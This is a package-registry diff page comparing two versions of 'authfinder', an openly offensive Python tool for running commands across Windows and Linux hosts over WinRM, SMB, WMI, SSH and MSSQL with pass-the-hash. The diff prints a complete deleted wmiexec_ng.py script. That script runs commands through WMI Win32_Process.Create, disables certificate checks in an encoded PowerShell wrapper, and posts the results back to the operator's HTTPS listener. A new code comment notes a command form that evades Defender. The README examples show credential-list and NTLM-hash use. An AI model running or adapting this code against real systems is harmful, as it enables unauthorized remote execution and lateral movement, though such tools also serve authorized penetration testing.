PyPI - authfinder - Versions diffs - 1.2.0__tar.gz → 1.2.2__tar.gz - Mend

authfinder 1.2.0tar.gz → 1.2.2tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (14) hide show

{authfinder-1.2.0 → authfinder-1.2.2}/PKG-INFO RENAMED Viewed

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: authfinder
-Version: 1.2.0
+Version: 1.2.2
 Summary: Execute commands across Windows and Linux systems using multiple RCE methods (WinRM, SMB, WMI, RDP, SSH, MSSQL)
 Author: Khael
 Project-URL: Homepage, https://github.com/KhaelK138/authfinder
@@ -21,6 +21,7 @@ Classifier: Topic :: System :: Systems Administration
 Requires-Python: >=3.8
 Description-Content-Type: text/markdown
 License-File: LICENSE
+Requires-Dist: impacket
 Provides-Extra: dev
 Requires-Dist: build; extra == "dev"
 Requires-Dist: twine; extra == "dev"
@@ -44,7 +45,7 @@ Big thanks to NetExec, Impacket, and Evil-Winrm, as this tool just essentially a
   - SSH (NetExec)
   - MSSQL (Impacket)
 - **Multi-threaded**: Execute commands across multiple hosts simultaneously
-- **Automatic Pass-the-Hash**: Just paste the NTLM hash as the credential
+- **Pass-the-Hash**: Use `-H` to pass an NTLM hash
 - **Linux Support**: Use `--linux` to attempt to run commands across linux machines instead, via SSH
 ## Installation
@@ -80,7 +81,10 @@ authfinder 192.168.1.10 -u administrator -p Password123 -c whoami
 authfinder 192.168.1.1-50 -u admin -p Pass123 -c 'net user'
 # Use nthash instead of password
-authfinder 10.0.0.1-10 -u admin -p :{32-bit-hash} whoami
+authfinder 10.0.0.1-10 -u admin -H :{32-bit-hash} -c whoami
+# Pass list of creds
+authfinder 10.0.0.1-10 -f creds.txt -c whoami
 ```
 ### IP Range Format

{authfinder-1.2.0 → authfinder-1.2.2}/README.md RENAMED Viewed

@@ -16,7 +16,7 @@ Big thanks to NetExec, Impacket, and Evil-Winrm, as this tool just essentially a
   - SSH (NetExec)
   - MSSQL (Impacket)
 - **Multi-threaded**: Execute commands across multiple hosts simultaneously
-- **Automatic Pass-the-Hash**: Just paste the NTLM hash as the credential
+- **Pass-the-Hash**: Use `-H` to pass an NTLM hash
 - **Linux Support**: Use `--linux` to attempt to run commands across linux machines instead, via SSH
 ## Installation
@@ -52,7 +52,10 @@ authfinder 192.168.1.10 -u administrator -p Password123 -c whoami
 authfinder 192.168.1.1-50 -u admin -p Pass123 -c 'net user'
 # Use nthash instead of password
-authfinder 10.0.0.1-10 -u admin -p :{32-bit-hash} whoami
+authfinder 10.0.0.1-10 -u admin -H :{32-bit-hash} -c whoami
+# Pass list of creds
+authfinder 10.0.0.1-10 -f creds.txt -c whoami
 ```
 ### IP Range Format

{authfinder-1.2.0 → authfinder-1.2.2}/authfinder/__init__.py RENAMED Viewed

@@ -1,3 +1,3 @@
 """authfinder: Execute commands across Windows and Linux systems using multiple RCE methods"""
-__version__ = "1.2.0"
+__version__ = "1.2.2"

{authfinder-1.2.0 → authfinder-1.2.2}/authfinder/authfinder.py RENAMED Viewed

@@ -22,7 +22,7 @@ TOOLS_SPECIFIED = False
 LINUX_MODE = False
 VALID_TOOLS = ["winrm", "smbexec", "wmi", "ssh", "mssql", "psexec", "atexec", "rdp"]
-NXC_TOOLS = {"smbexec", "ssh", "rdp"}
+NXC_TOOLS = {"smbexec", "ssh", "wmi", "rdp"}
 IMPACKET_PREFIX = "impacket-"  # or "" for .py suffix
 NXC_CMD = "nxc"
@@ -210,13 +210,6 @@ def build_cmd(tool, user, target, credential, command, use_hash=False):
         return (f"{cmd} -hashes :{hash_val} \"{user}\"@{target} 'powershell -enc {b64}'"
                 if use_hash else
                 f"{cmd} \"{user}\":{credential}@{target} 'powershell -enc {b64}'")
-    if tool == "wmi":
-        # Use wmiexec-ng for WMI execution (uses HTTPS callback for output retrieval)
-        output_flag = " -o" if OUTPUT else ""
-        return (f"wmiexec-ng {target} -u \"{user}\" -H {hash_val} -x 'powershell -enc {b64}'{output_flag}"
-                if use_hash else
-                f"wmiexec-ng {target} -u \"{user}\" -p {credential} -x 'powershell -enc {b64}'{output_flag}")
     # winrm handling - both regular and SSL variants
     # yes I know nxc has a winrm module which can oneshot commands, but evil-winrm has proved itself more dependable
@@ -236,6 +229,13 @@ def build_cmd(tool, user, target, credential, command, use_hash=False):
                 if use_hash else
                 f"{NXC_CMD} smb {target} -p {credential} -u \"{user}\" -X 'powershell -enc {b64}' --exec-method smbexec{nxc_output_flag}")
+    if tool == "wmi":
+        # we don't actually need to pass the --no-output here, as defender won't catch it with this specific `cmd /c "powershell -enc` combo
+        # additionally, adding --no-output makes it very difficult to differentiate between command execution and a successful authentication w/o execution for wmi specifically
+        return (f"{NXC_CMD} wmi {target} -H {hash_val} -u \"{user}\" -X 'cmd /c \"powershell -enc {b64}\"'"
+                if use_hash else
+                f"{NXC_CMD} wmi {target} -p {credential} -u \"{user}\" -X 'cmd /c \"powershell -enc {b64}\"'")
     if tool == "ssh":
         if LINUX_MODE:
             b64 = base64.b64encode(command.encode("utf-8")).decode()

{authfinder-1.2.0 → authfinder-1.2.2}/authfinder.egg-info/PKG-INFO RENAMED Viewed

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: authfinder
-Version: 1.2.0
+Version: 1.2.2
 Summary: Execute commands across Windows and Linux systems using multiple RCE methods (WinRM, SMB, WMI, RDP, SSH, MSSQL)
 Author: Khael
 Project-URL: Homepage, https://github.com/KhaelK138/authfinder
@@ -21,6 +21,7 @@ Classifier: Topic :: System :: Systems Administration
 Requires-Python: >=3.8
 Description-Content-Type: text/markdown
 License-File: LICENSE
+Requires-Dist: impacket
 Provides-Extra: dev
 Requires-Dist: build; extra == "dev"
 Requires-Dist: twine; extra == "dev"
@@ -44,7 +45,7 @@ Big thanks to NetExec, Impacket, and Evil-Winrm, as this tool just essentially a
   - SSH (NetExec)
   - MSSQL (Impacket)
 - **Multi-threaded**: Execute commands across multiple hosts simultaneously
-- **Automatic Pass-the-Hash**: Just paste the NTLM hash as the credential
+- **Pass-the-Hash**: Use `-H` to pass an NTLM hash
 - **Linux Support**: Use `--linux` to attempt to run commands across linux machines instead, via SSH
 ## Installation
@@ -80,7 +81,10 @@ authfinder 192.168.1.10 -u administrator -p Password123 -c whoami
 authfinder 192.168.1.1-50 -u admin -p Pass123 -c 'net user'
 # Use nthash instead of password
-authfinder 10.0.0.1-10 -u admin -p :{32-bit-hash} whoami
+authfinder 10.0.0.1-10 -u admin -H :{32-bit-hash} -c whoami
+# Pass list of creds
+authfinder 10.0.0.1-10 -f creds.txt -c whoami
 ```
 ### IP Range Format

{authfinder-1.2.0 → authfinder-1.2.2}/authfinder.egg-info/SOURCES.txt RENAMED Viewed

@@ -3,7 +3,6 @@ README.md
 pyproject.toml
 authfinder/__init__.py
 authfinder/authfinder.py
-authfinder/wmiexec_ng.py
 authfinder.egg-info/PKG-INFO
 authfinder.egg-info/SOURCES.txt
 authfinder.egg-info/dependency_links.txt

{authfinder-1.2.0 → authfinder-1.2.2}/authfinder.egg-info/entry_points.txt RENAMED Viewed

@@ -1,3 +1,2 @@
 [console_scripts]
 authfinder = authfinder.authfinder:main
-wmiexec-ng = authfinder.wmiexec_ng:main

{authfinder-1.2.0 → authfinder-1.2.2}/authfinder.egg-info/requires.txt RENAMED Viewed

@@ -1,3 +1,4 @@
+impacket
 [dev]
 build

{authfinder-1.2.0 → authfinder-1.2.2}/pyproject.toml RENAMED Viewed

@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
 [project]
 name = "authfinder"
-version = "1.2.0"
+version = "1.2.2"
 description = "Execute commands across Windows and Linux systems using multiple RCE methods (WinRM, SMB, WMI, RDP, SSH, MSSQL)"
 readme = "README.md"
 authors = [
@@ -25,7 +25,9 @@ classifiers = [
 ]
 keywords = ["security", "pentest", "windows", "remote-execution", "winrm", "smb", "wmi", "rdp"]
 requires-python = ">=3.8"
-dependencies = []
+dependencies = [
+    "impacket",
+]
 [project.optional-dependencies]
 dev = [
@@ -35,7 +37,6 @@ dev = [
 [project.scripts]
 authfinder = "authfinder.authfinder:main"
-wmiexec-ng = "authfinder.wmiexec_ng:main"
 [project.urls]
 Homepage = "https://github.com/KhaelK138/authfinder"

authfinder-1.2.0/authfinder/wmiexec_ng.py DELETED Viewed

@@ -1,319 +0,0 @@
-#!/usr/bin/env python3
-"""
-WMI process execution with HTTPS-based output retrieval.
-Requires: pip install impacket
-"""
-import sys
-import os
-import ssl
-import uuid
-import socket
-import random
-import argparse
-import tempfile
-import threading
-import subprocess
-from http.server import HTTPServer, BaseHTTPRequestHandler
-from impacket.dcerpc.v5.dcom import wmi
-from impacket.dcerpc.v5.dcomrt import DCOMConnection
-from impacket.dcerpc.v5.dtypes import NULL
-# Globals for server coordination
-output_received = threading.Event()
-output_data = b""
-verbose = False
-def log(msg: str):
-    """Print message only if verbose mode is enabled."""
-    if verbose:
-        print(msg)
-def get_local_ip(target: str) -> str:
-    """Get the local IP address used to reach a target."""
-    try:
-        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-        s.connect((target, 80))
-        local_ip = s.getsockname()[0]
-        s.close()
-        return local_ip
-    except Exception:
-        return "127.0.0.1"
-def find_available_port(start: int = 10000, end: int = 30000) -> int:
-    """Find an available port in the given range, retrying every second."""
-    while True:
-        port = random.randint(start, end)
-        try:
-            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
-            s.bind(("0.0.0.0", port))
-            s.close()
-            log(f"[*] Found available port: {port}")
-            return port
-        except OSError:
-            log(f"[*] Port {port} unavailable, retrying...")
-            import time
-            time.sleep(1)
-def generate_ssl_cert(cert_file: str, key_file: str):
-    """Generate a self-signed SSL certificate using openssl."""
-    log("[*] Generating SSL certificate...")
-    cmd = [
-        "openssl", "req", "-x509", "-newkey", "rsa:2048",
-        "-keyout", key_file,
-        "-out", cert_file,
-        "-days", "1", "-nodes",
-        "-subj", "/CN=localhost"
-    ]
-    try:
-        subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
-        log("[*] SSL certificate generated")
-    except subprocess.CalledProcessError:
-        print("[!] Failed to generate SSL certificate (is openssl installed?)")
-        sys.exit(1)
-class OutputHandler(BaseHTTPRequestHandler):
-    """HTTP handler for receiving command output via POST."""
-    def do_POST(self):
-        global output_data
-        try:
-            content_length = int(self.headers.get("Content-Length", 0))
-            output_data = self.rfile.read(content_length)
-            self.send_response(200)
-            self.end_headers()
-            self.wfile.write(b"OK")
-            output_received.set()
-        except Exception as e:
-            log(f"[!] Error receiving output: {e}")
-            self.send_response(500)
-            self.end_headers()
-    def log_message(self, format, *args):
-        if verbose:
-            super().log_message(format, *args)
-def start_https_server(port: int, cert_file: str, key_file: str) -> HTTPServer:
-    """Start HTTPS server for receiving output."""
-    server = HTTPServer(("0.0.0.0", port), OutputHandler)
-    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
-    context.load_cert_chain(cert_file, key_file)
-    server.socket = context.wrap_socket(server.socket, server_side=True)
-    return server
-def build_powershell_command(command: str, output_file: str, server_url: str) -> str:
-    """Build the PowerShell script that executes command and uploads output."""
-    import base64
-    # Base64 encode the user's command (UTF-16LE for PowerShell -enc)
-    user_cmd_encoded = base64.b64encode(command.encode("utf-16-le")).decode("ascii")
-    # PowerShell script with TLS cert bypass
-    # Executes user command via -enc, captures output, uploads via HTTPS
-    ps_script = f'''
-[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-Add-Type @"
-using System.Net;
-using System.Security.Cryptography.X509Certificates;
-public class TrustAllCertsPolicy : ICertificatePolicy {{
-    public bool CheckValidationResult(
-        ServicePoint srvPoint, X509Certificate certificate,
-        WebRequest request, int certificateProblem) {{
-        return true;
-    }}
-}}
-"@
-[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
-powershell.exe -enc {user_cmd_encoded} | Out-File -FilePath "{output_file}" -Encoding UTF8
-$bytes = [System.IO.File]::ReadAllBytes("{output_file}")
-Invoke-WebRequest -Uri "{server_url}" -Method POST -Body $bytes -UseBasicParsing | Out-Null
-Remove-Item -Path "{output_file}" -Force
-'''
-    # Encode wrapper script as base64 for safe transport
-    encoded = base64.b64encode(ps_script.encode("utf-16-le")).decode("ascii")
-    return f'powershell.exe -EncodedCommand {encoded}'
-def wmi_exec(target: str, username: str, password: str, command: str,
-             domain: str = "", hashes: str = "", get_output: bool = False,
-             timeout: int = 30) -> str | None:
-    """
-    Execute a command via WMI.
-    Args:
-        target: Target IP or hostname
-        username: Username for authentication
-        password: Password for authentication
-        command: Command to execute
-        domain: Domain (optional)
-        hashes: NTLM hashes in LMHASH:NTHASH format (optional, for pass-the-hash)
-        get_output: Whether to retrieve command output via HTTPS
-        timeout: Timeout in seconds for output retrieval
-    Returns:
-        Command output if get_output=True, None otherwise
-    """
-    global output_data, output_received
-    # Parse hashes if provided
-    lmhash = ""
-    nthash = ""
-    if hashes:
-        if ":" in hashes:
-            lmhash, nthash = hashes.split(":", 1)
-        else:
-            # Assume it's just the NT hash
-            nthash = hashes
-    # Reset globals
-    output_data = b""
-    output_received.clear()
-    server = None
-    server_thread = None
-    temp_dir = None
-    try:
-        if get_output:
-            # Setup HTTPS server for output retrieval
-            temp_dir = tempfile.mkdtemp()
-            cert_file = os.path.join(temp_dir, "cert.pem")
-            key_file = os.path.join(temp_dir, "key.pem")
-            generate_ssl_cert(cert_file, key_file)
-            port = find_available_port()
-            local_ip = get_local_ip(target)
-            server_url = f"https://{local_ip}:{port}/"
-            log(f"[*] Starting HTTPS server on {local_ip}:{port}")
-            server = start_https_server(port, cert_file, key_file)
-            # Run server in background thread
-            server_thread = threading.Thread(target=server.handle_request, daemon=True)
-            server_thread.start()
-            # Build PowerShell command with output upload
-            output_file = f"C:\\Windows\\Temp\\{uuid.uuid4()}.txt"
-            full_command = build_powershell_command(command, output_file, server_url)
-            log(f"[*] Output will be uploaded to {server_url}")
-        else:
-            full_command = command
-        # Connect via DCOM
-        log(f"[*] Connecting to {target}...")
-        dcom = DCOMConnection(target, username, password, domain, lmhash, nthash)
-        try:
-            # Get WMI interface
-            iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
-            iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
-            # Login to namespace
-            iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
-            iWbemLevel1Login.RemRelease()
-            # Get Win32_Process class
-            win32_process, _ = iWbemServices.GetObject("Win32_Process")
-            # Call Create method
-            log(f"[*] Executing command...")
-            win32_process.Create(full_command, "C:\\", None)
-            if not get_output:
-                print(f"[+] Executed: {command}")
-                return None
-        finally:
-            dcom.disconnect()
-        # Wait for output
-        if get_output:
-            log(f"[*] Waiting for output (timeout: {timeout}s)...")
-            if output_received.wait(timeout=timeout):
-                result = output_data.decode("utf-8", errors="replace")
-                # Strip BOM and whitespace
-                result = result.lstrip("\ufeff").strip()
-                print(result)
-                return result
-            else:
-                print("[!] Timeout waiting for output")
-                return None
-    finally:
-        # Cleanup
-        if server:
-            server.server_close()
-        if temp_dir:
-            import shutil
-            shutil.rmtree(temp_dir, ignore_errors=True)
-def main():
-    global verbose
-    parser = argparse.ArgumentParser(
-        description="WMI remote command execution with optional output retrieval",
-        formatter_class=argparse.RawDescriptionHelpFormatter,
-        epilog="""
-Examples:
-  # Execute with password
-  %(prog)s 192.168.1.10 -u Administrator -p 'password' -x 'whoami' -o
-  # Pass-the-hash
-  %(prog)s 192.168.1.10 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -x 'whoami' -o
-  # Blank password (if neither -p nor -H supplied)
-  %(prog)s 192.168.1.10 -u Administrator -x 'whoami' -o
-  # With domain
-  %(prog)s 192.168.1.10 -u Administrator -p 'password' -d MYDOMAIN -x 'whoami' -o
-"""
-    )
-    parser.add_argument("target", help="Target IP or hostname")
-    parser.add_argument("-u", "--username", required=True, help="Username")
-    parser.add_argument("-p", "--password", default="", help="Password")
-    parser.add_argument("-H", "--hashes", metavar="[LMHASH:]NTHASH",
-                        help="NTLM hashes for pass-the-hash")
-    parser.add_argument("-d", "--domain", default="", help="Domain")
-    parser.add_argument("-x", "--execute", required=True, metavar="CMD",
-                        help="Command to execute")
-    parser.add_argument("-o", "--output", action="store_true",
-                        help="Retrieve command output via HTTPS callback")
-    parser.add_argument("-t", "--timeout", type=int, default=30,
-                        help="Timeout for output retrieval (default: 30s)")
-    parser.add_argument("-v", "--verbose", action="store_true",
-                        help="Show verbose output (HTTPS server activity, etc.)")
-    args = parser.parse_args()
-    verbose = args.verbose
-    # Use blank password if neither -p nor -H supplied
-    password = args.password
-    hashes = args.hashes or ""
-    wmi_exec(
-        target=args.target,
-        username=args.username,
-        password=password,
-        command=args.execute,
-        domain=args.domain,
-        hashes=hashes,
-        get_output=args.output,
-        timeout=args.timeout
-    )
-if __name__ == "__main__":
-    main()

{authfinder-1.2.0 → authfinder-1.2.2}/LICENSE RENAMED Viewed

File without changes

{authfinder-1.2.0 → authfinder-1.2.2}/authfinder.egg-info/dependency_links.txt RENAMED Viewed

File without changes

{authfinder-1.2.0 → authfinder-1.2.2}/authfinder.egg-info/top_level.txt RENAMED Viewed

File without changes

{authfinder-1.2.0 → authfinder-1.2.2}/setup.cfg RENAMED Viewed

File without changes

authfinder 1.2.0__tar.gz → 1.2.2__tar.gz

authfinder 1.2.0tar.gz → 1.2.2tar.gz